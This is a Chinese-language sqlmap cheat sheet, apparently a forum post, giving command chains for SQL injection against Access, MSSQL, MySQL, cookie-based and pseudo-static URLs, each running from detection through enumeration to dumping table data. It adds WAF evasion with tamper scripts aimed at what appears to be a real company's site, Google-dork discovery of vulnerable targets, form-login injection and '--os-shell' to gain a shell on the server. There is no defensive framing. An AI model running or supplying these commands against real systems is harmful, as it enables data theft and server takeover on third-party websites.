ACCESS数据库注入
#注入点:http://www.xxx.cn/news.asp?nid=279 注入点
sqlmap -u http://www.xxx.cn/news.asp?nid=279 #判断注入
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --tables #猜表
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --columns -T 表名 # 猜字段
sqlmap -u http://www.xxx.cn/news.asp?nid=279 --dump -T 表名 -C 字段 # 爆数据
MSSQL数据库注入
#注入点:http://www.xxx.com/news/content.jsp?id=43
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 #判断注入
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 --dbs #列库
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 --tables #猜表
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 -T 表名 --columns #猜字段
sqlmap -u http://www.xxx.com/news/content.jsp?id=43 -D 库名 -T 表名 -C "字段名" --dump #爆数据
cookies注入
#注入点:http://xxx.com/ProductShow.asp?ID=130
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --level 2 #判断注入
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --table --level 2 #猜表
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --columns -T 表名 --level 2 #猜字段
sqlmap -u "http://xxx.com/ProductShow.asp" --cookie "ID=130" --dump -T 表名 -C "字段名" --level 2 #爆数据
伪静态注入
#注入点:http://www.xxx.com/index.php/Index/view/id/40.html
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html #判断注入
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html --dbs #列库
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 --tables #猜表
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 -T 表名 --columns #猜字段
sqlmap -u http://www.xxx.com/index.php/Index/view/id/40*.html -D 库名 -T 表名 -C "字段名" --dump #爆数据
MYSQL数据库注入
#注入点:http://www.xxx111.com/news/gis/region.php?id=3
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 #判断注入
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 --dbs #列库
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 --tables #猜表
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 -T 表名 --columns #猜字段
sqlmap -u http://www.xxx111.com/news/gis/region.php?id=3 -D 库名 -T 表名 -C "字段名" --dump #爆数据
WAF防火墙的绕过
使用tamper脚本修改请求从而逃避WAF的规则检测
tamper脚本下载:https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
temper脚本:
针对MYSQL:space2morehash.py、space2hash.py
空格替换:space2mssqlblank.py、space2mysqlblank.py、
打乱编码:charencode.py、chardoubleencode.py
针对asp/asp.net:charunicodeencode.py、percentage.py
#注入点:http://www.bmw.com.tw/news/content.jsp?id=43
sqlmap -u http://www.bmw.com.tw/news/content.jsp?id=43 -v 3 --batch --tamper "space2morehash.py" #判断注入
sqlmap -u http://www.bmw.com.tw/news/content.jsp?id=43 -v 3 -D 库名 -T 表名 -C "字段名" --dump --batch --tamper "space2morehash.py" #爆数据
谷歌搜索注入点注入
sqlmap -g inurl:asp?id= #命令
#post登录注入
sqlmap -u 地址 --forms #命令
#交互写shell
sqlmap -u 地址 --os-shell #命令
#生成上传文件:tmpuoiuz.php
Cold_dust Chrome Windows 10
不知道有没有用呢
作者 一级 2020-03-13 19:46 回复